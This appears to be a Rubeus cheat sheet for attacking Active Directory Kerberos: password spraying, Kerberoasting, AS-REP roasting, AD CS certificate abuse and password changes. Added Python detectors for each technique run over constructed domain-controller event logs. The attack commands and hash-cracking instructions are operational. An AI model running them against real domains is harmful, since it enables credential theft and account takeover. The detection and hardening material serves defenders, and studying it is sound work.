Rubeus is a Windows-only post-exploitation tool for attacking Kerberos. No compiled binaries are available (either through the GitHub repo or Kali Linux’s windows-binaries package).

Important

To use Rubeus you must already be on the domain you are attacking, or alternatively have mapped the domain controller's IP address (the DC normally hosts the KDC) properly in C:\Windows\System32\drivers\etc\hosts.

Harvest Kerberos tickets

# Harvest ticket granting tickets observed by the current machine.
# Probably works best when run on a domain controller.
#
Rubeus.exe harvest /interval:30

Password spraying

# Spray the specified password across all known users and generate a
# ticket-granting ticket for successful authentications. (Can trigger
# account lockouts!)
#
Rubeus.exe brute /password:ThePasswordToSpray /noticket
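On the domain controller, a spray like the one above shows up as a burst of Kerberos pre-authentication failures (Security event 4771, Status 0x18, KDC_ERR_PREAUTH_FAILED) for many different accounts from a single source address. The Python below is an added example written for this page, not code from Rubeus or from the original cheat sheet. The event records are constructed, and the flat field names (time, user, ip, status) are an assumed simplification of the 4771 event's TargetUserName, IpAddress and Status fields.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4771 (Kerberos pre-authentication failed)
# records as a domain controller logs them; these are not real log data.
# Status 0x18 is KDC_ERR_PREAUTH_FAILED, i.e. a wrong password was supplied.
SAMPLE_4771 = [
    # one user mistyping their own password repeatedly: not a spray
    {"time": "2024-05-01T09:00:01", "user": "alice", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-05-01T09:00:05", "user": "alice", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-05-01T09:00:09", "user": "alice", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-05-01T09:00:14", "user": "alice", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-05-01T09:00:20", "user": "alice", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-05-01T09:00:25", "user": "alice", "ip": "10.0.0.50", "status": "0x18"},
    # one password tried against many accounts from a single host: a spray
    {"time": "2024-05-01T09:10:00", "user": "alice", "ip": "10.0.0.99", "status": "0x18"},
    {"time": "2024-05-01T09:10:01", "user": "bob",   "ip": "10.0.0.99", "status": "0x18"},
    {"time": "2024-05-01T09:10:02", "user": "carol", "ip": "10.0.0.99", "status": "0x18"},
    {"time": "2024-05-01T09:10:03", "user": "dave",  "ip": "10.0.0.99", "status": "0x18"},
    {"time": "2024-05-01T09:10:04", "user": "erin",  "ip": "10.0.0.99", "status": "0x18"},
    {"time": "2024-05-01T09:10:05", "user": "frank", "ip": "10.0.0.99", "status": "0x18"},
    # status 0x25 is clock skew, not a password guess, and must not count
    {"time": "2024-05-01T09:10:06", "user": "grace", "ip": "10.0.0.99", "status": "0x25"},
    # two users failing an hour apart from the same host: below threshold
    {"time": "2024-05-01T10:00:00", "user": "heidi", "ip": "10.0.0.7",  "status": "0x18"},
    {"time": "2024-05-01T11:00:00", "user": "ivan",  "ip": "10.0.0.7",  "status": "0x18"},
]


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source_ip: set_of_users} for each source that produced
    KDC_ERR_PREAUTH_FAILED for at least `min_users` distinct accounts inside
    some `window`-long interval. Counting distinct accounts per source, not raw
    failures, is what separates a spray from one person mistyping a password."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["status"].lower() == "0x18":
            by_ip[ev["ip"]].append((datetime.fromisoformat(ev["time"]), ev["user"]))

    hits = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            # every attempt from this source that falls inside [start, start + window]
            users = {user for ts, user in attempts[i:] if ts - start <= window}
            if len(users) >= min_users:
                hits.setdefault(ip, set()).update(users)
    return hits


if __name__ == "__main__":
    for ip, users in detect_password_spray(SAMPLE_4771).items():
        print(f"possible password spray from {ip}: {len(users)} accounts "
              f"({', '.join(sorted(users))})")
```

The thresholds are deliberately parameters: five distinct accounts in five minutes is a starting point, not a universal rule. When a sprayed password is correct the same source produces a successful 4768 right after the run of 4771 failures, and the lockouts the comment above warns about appear as event 4740, so both are useful corroborating signals.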

Kerberoasting

Kerberoasting with Rubeus

# Extract password hashes for all known kerberoastable accounts using
# Rubeus.
#
Rubeus.exe kerberoast

The password hashes output here can then be cracked with Hashcat (use the 13100 hash mode).


AS-REP roasting

AS-REP roasting with Rubeus

# AS-REP roasting with Rubeus.
#
Rubeus.exe asreproast

To use Hashcat to crack the hashes obtained in this fashion, first insert 23$ after the leading $krb5asrep$ (so the hash starts with $krb5asrep$23$) and then use mode 18200.
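Both the Kerberoasting and the AS-REP roasting commands above leave a distinctive trace on the domain controller: Kerberoasting as a burst of RC4-encrypted service tickets (Security event 4769, TicketEncryptionType 0x17) for several SPN-bearing user accounts from one requester, and AS-REP roasting as a TGT issued with no pre-authentication (Security event 4768, PreAuthType 0), which only happens for accounts flagged DONT_REQ_PREAUTH. The Python below is an added example for this page covering both sections; it is not code from Rubeus or the original cheat sheet. The event records are constructed, and the flat field names (requester, service, enc, preauth, status) are an assumed simplification of the events' TargetUserName, ServiceName, TicketEncryptionType, PreAuthType and Status fields.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 (Kerberos service ticket requested)
# records; not real log data. enc 0x17 = RC4-HMAC, 0x12 = AES256, 0x11 = AES128.
SAMPLE_4769 = [
    # a normal AES service ticket for a user account that carries an SPN
    {"time": "2024-05-01T09:00:00", "requester": "alice",   "service": "svc_sql",    "enc": "0x12", "status": "0x0",  "ip": "10.0.0.50"},
    # a computer account (name ends in $) on RC4: excluded, its key is not a crackable password
    {"time": "2024-05-01T09:00:01", "requester": "alice",   "service": "WS01$",      "enc": "0x17", "status": "0x0",  "ip": "10.0.0.50"},
    # RC4 tickets for several SPN user accounts in quick succession: the roasting pattern
    {"time": "2024-05-01T09:05:00", "requester": "mallory", "service": "svc_sql",    "enc": "0x17", "status": "0x0",  "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:05:01", "requester": "mallory", "service": "svc_web",    "enc": "0x17", "status": "0x0",  "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:05:02", "requester": "mallory", "service": "svc_backup", "enc": "0x17", "status": "0x0",  "ip": "10.0.0.99"},
    # krbtgt appears in normal TGS traffic and is excluded
    {"time": "2024-05-01T09:05:03", "requester": "mallory", "service": "krbtgt",     "enc": "0x12", "status": "0x0",  "ip": "10.0.0.99"},
    # a failed request (non-zero status) issued no ticket, so there is nothing to crack
    {"time": "2024-05-01T09:05:04", "requester": "mallory", "service": "svc_old",    "enc": "0x17", "status": "0x1b", "ip": "10.0.0.99"},
]

# Constructed sample of Security event 4768 (Kerberos TGT requested) records.
# preauth 2 = PA-ENC-TIMESTAMP (password), 0 = no pre-authentication at all.
SAMPLE_4768 = [
    {"time": "2024-05-01T09:00:00", "user": "alice",      "preauth": 2, "enc": "0x12", "status": "0x0", "ip": "10.0.0.50"},
    {"time": "2024-05-01T09:05:10", "user": "svc_legacy", "preauth": 0, "enc": "0x17", "status": "0x0", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:05:11", "user": "bob",        "preauth": 2, "enc": "0x17", "status": "0x0", "ip": "10.0.0.99"},
]


def _roastable_service(name):
    """Kerberoasting targets user accounts that carry an SPN. Computer accounts
    (trailing $) and krbtgt are excluded: their keys are random, and their RC4
    tickets would otherwise drown the signal."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoast(events, window=timedelta(minutes=2), min_services=3):
    """Return {requester: set_of_services} for requesters that obtained RC4
    (0x17) service tickets for at least `min_services` distinct roastable
    accounts inside one `window`. A single RC4 ticket can be a legacy client;
    a burst of them across many SPN accounts is the tool's signature."""
    per_requester = defaultdict(list)
    for ev in events:
        if ev["status"] == "0x0" and ev["enc"].lower() == "0x17" and _roastable_service(ev["service"]):
            per_requester[ev["requester"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))

    hits = {}
    for who, reqs in per_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(services) >= min_services:
                hits.setdefault(who, set()).update(services)
    return hits


def detect_asrep_roast(events):
    """Return the accounts issued a TGT with pre-authentication type 0, i.e.
    accounts flagged DONT_REQ_PREAUTH. Each such successful 4768 is an AS-REP
    that can be taken offline; clearing the flag on the account removes the exposure."""
    return sorted({ev["user"] for ev in events if ev["status"] == "0x0" and ev["preauth"] == 0})


if __name__ == "__main__":
    for who, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {who}: RC4 tickets for {', '.join(sorted(services))}")
    for user in detect_asrep_roast(SAMPLE_4768):
        print(f"possible AS-REP roasting: TGT for {user} issued without pre-authentication")
```

4769 is one of the noisiest events a DC produces, so filter on Status 0x0 and the encryption type before doing any aggregation. On the hardening side, the RC4 signal disappears for accounts whose msDS-SupportedEncryptionTypes allows only AES, and service accounts with long random passwords or gMSAs make any ticket that is obtained worthless to crack; AS-REP roasting is removed entirely by clearing DONT_REQ_PREAUTH on the accounts this rule surfaces.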


Use a certificate to request a ticket

Start by using Certify.exe on the target:

# Identify vulnerable AD CS templates.
#
Certify.exe find /vulnerable
 
# Request a CSR using a vulnerable template.
#
Certify.exe request /ca:$AD_CS_CA /template:$TEMPLATE_NAME `
                    $OTHER_OPTIONS_AS_APPROPRIATE_TO_THE_ATTACK

Take the output of the last command above and paste it into a $CERTIFICATE_PEM_FILE on the attacking box. Then:

openssl pkcs12 -in $CERTIFICATE_PEM_FILE -keyex \
               -CSP "Microsoft Enhanced Cryptographic Provider v1.0" \
               -export -out $CERTIFICATE_PFX_FILE

Move $CERTIFICATE_PFX_FILE back to the target, and then use Rubeus to seal the deal:

# Request a ticket using a certificate from AD CS.
#
Rubeus.exe asktgt /user:$USER `
                  /enctype:aes256 `
                  /certificate:$CERTIFICATE_PFX_FILE `
                  /password:$CERTIFICATE_FILE_PASSWORD `
                  /outfile:$TICKET_FILE `
                  /domain:$DOMAIN `
                  /dc:$DC_IP_ADDRESS

This is very useful if we’ve used an AD CS misconfiguration as described by SpecterOps’ “Certified Pre-Owned” research to forge a certificate that’s valid for another user.
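The two steps above leave records on the CA and on the DC that a defender can correlate: the issuance is logged on the CA as event 4887 (certificate request approved and issued), whose Attributes field carries any subject alternative name the requester supplied, and the asktgt call is logged on the DC as a 4768 with PreAuthType 16 (PA-PK-AS-REQ) and populated Certificate Information fields. The Python below is an added example for this page, not code from Rubeus, Certify or the original cheat sheet. The records are constructed; the layout of the 4887 Attributes field, the flat 4768 field names, the template name VulnTemplate and the allowlist of expected certificate users are all assumptions made for the example.

```python
import re

# Constructed sample of Security event 4768 records as logged by a DC. For a
# certificate (PKINIT) logon the event carries pre-auth type 16 and populated
# Certificate Information fields; the thumbprints below are made up.
SAMPLE_4768_PKINIT = [
    {"user": "alice",         "preauth": 16, "cert_thumbprint": "0123456789abcdef0123456789abcdef01234567", "ip": "10.0.0.50"},
    {"user": "bob",           "preauth": 2,  "cert_thumbprint": "",                                         "ip": "10.0.0.51"},
    {"user": "administrator", "preauth": 16, "cert_thumbprint": "89abcdef0123456789abcdef0123456789abcdef", "ip": "10.0.0.99"},
]

# Constructed sample of AD CS event 4887 (certificate request approved and
# issued) records from the CA's Security log. The layout of the Attributes
# field ("CertificateTemplate:<name>" plus an optional "SAN:upn=<upn>" entry)
# is an assumption about how caller-supplied request attributes appear, and
# "VulnTemplate" is a placeholder template name.
SAMPLE_4887 = [
    {"requester": "CORP\\bob",     "attributes": "CertificateTemplate:User"},
    {"requester": "CORP\\alice",   "attributes": "CertificateTemplate:User\nSAN:upn=alice@corp.local"},
    {"requester": "CORP\\mallory", "attributes": "CertificateTemplate:VulnTemplate\nSAN:upn=administrator@corp.local"},
]

_TEMPLATE = re.compile(r"CertificateTemplate:([^\r\n]+)")
_SAN_UPN = re.compile(r"upn=([^,\s]+)", re.IGNORECASE)


def san_mismatches(events):
    """Flag issued certificates whose requester-supplied SAN names a different
    account than the one that made the request. A template that lets the
    enrollee choose the SAN and is usable for authentication is the condition
    the Certified Pre-Owned paper describes; a mismatch here is the record of
    it being used."""
    findings = []
    for ev in events:
        san = _SAN_UPN.search(ev["attributes"])
        if not san:
            continue  # no caller-supplied SAN: the subject came from the directory
        san_upn = san.group(1)
        requester_sam = ev["requester"].split("\\")[-1].lower()
        if san_upn.split("@")[0].lower() != requester_sam:
            tmpl = _TEMPLATE.search(ev["attributes"])
            findings.append((ev["requester"], san_upn, tmpl.group(1) if tmpl else ""))
    return findings


def pkinit_logons_outside_allowlist(events, allowlist):
    """Flag certificate-based TGT requests for accounts that are not expected
    to authenticate with a certificate (for example, not smart-card enrolled).
    An empty thumbprint means the TGT was obtained with a password instead."""
    expected = {name.lower() for name in allowlist}
    return [ev["user"] for ev in events
            if ev.get("cert_thumbprint") and ev["user"].lower() not in expected]


if __name__ == "__main__":
    for requester, san, tmpl in san_mismatches(SAMPLE_4887):
        print(f"4887: {requester} was issued a certificate for {san} via template {tmpl}")
    for user in pkinit_logons_outside_allowlist(SAMPLE_4768_PKINIT, {"alice"}):
        print(f"4768: certificate logon for {user}, who is not an expected certificate user")
```

The two rules are strongest together: a 4887 with a mismatched SAN followed by a 4768 carrying a certificate thumbprint for the account named in that SAN is the full chain. Event 4887 is only written when the CA audits "Issue and manage certificate requests", so confirm that audit setting is on before relying on the first rule.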

Change a user’s password

# We can use Rubeus to change the password for domain users so long as
# our ticket is for a user with permission to do so (generally the user
# themselves or a domain admin).
#
Rubeus.exe changepw /ticket:$TICKET_FILE `
                    /new:$NEW_PASSWORD `
                    /dc:$DC_IP_ADDRESS `
                    /targetuser:$DOMAIN\$USER
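A password change made this way is still an ordinary password change as far as the domain controller is concerned, so with User Account Management auditing enabled it is recorded as Security event 4723 (change, old password known) or 4724 (reset), each naming the account that acted (Subject) and the account whose password changed (Target). A change where those two differ, performed by an account that is not a helpdesk or admin identity, is the thing to look for. The Python below is an added example for this page, not code from Rubeus or the original cheat sheet; the records, the approved-resetter allowlist and the privileged-target set are constructed for the example.

```python
# Constructed sample of Security events 4723 (password change, old password
# known) and 4724 (password reset) from a DC's Account Management audit; not
# real data. "subject" is the account that performed the action, "target" the
# account whose password changed.
SAMPLE_PW_EVENTS = [
    {"id": 4723, "subject": "alice",     "target": "alice"},          # self-service change
    {"id": 4724, "subject": "helpdesk1", "target": "bob"},            # reset by an approved helpdesk account
    {"id": 4724, "subject": "mallory",   "target": "carol"},          # reset by an unapproved account
    {"id": 4723, "subject": "mallory",   "target": "dave"},           # someone else's password changed
    {"id": 4724, "subject": "helpdesk1", "target": "administrator"},  # approved subject, but tier-0 target
]

APPROVED_RESETTERS = {"helpdesk1"}      # constructed allowlist of accounts allowed to reset others
PRIVILEGED_TARGETS = {"administrator"}  # constructed set of accounts nobody but themselves should touch


def suspicious_password_changes(events, approved=APPROVED_RESETTERS, privileged=PRIVILEGED_TARGETS):
    """Return (event_id, subject, target, reason) for every password change or
    reset that either touched a privileged account by anyone other than the
    account itself, or was performed on another account by a subject outside
    the approved set. Self-service changes are never flagged here."""
    approved = {a.lower() for a in approved}
    privileged = {p.lower() for p in privileged}
    findings = []
    for ev in events:
        subj, tgt = ev["subject"].lower(), ev["target"].lower()
        if subj == tgt:
            continue
        if tgt in privileged:
            findings.append((ev["id"], subj, tgt, "privileged target"))
        elif subj not in approved:
            findings.append((ev["id"], subj, tgt, "unapproved subject"))
    return findings


if __name__ == "__main__":
    for event_id, subj, tgt, reason in suspicious_password_changes(SAMPLE_PW_EVENTS):
        print(f"{event_id}: {subj} changed the password of {tgt} ({reason})")
```

When the ticket used is the target user's own (the self-service case in the comment above), Subject and Target are the same and this rule stays quiet by design; for that case the source address on the corresponding 4768/4769 events, compared with where that user normally logs on, is the better signal.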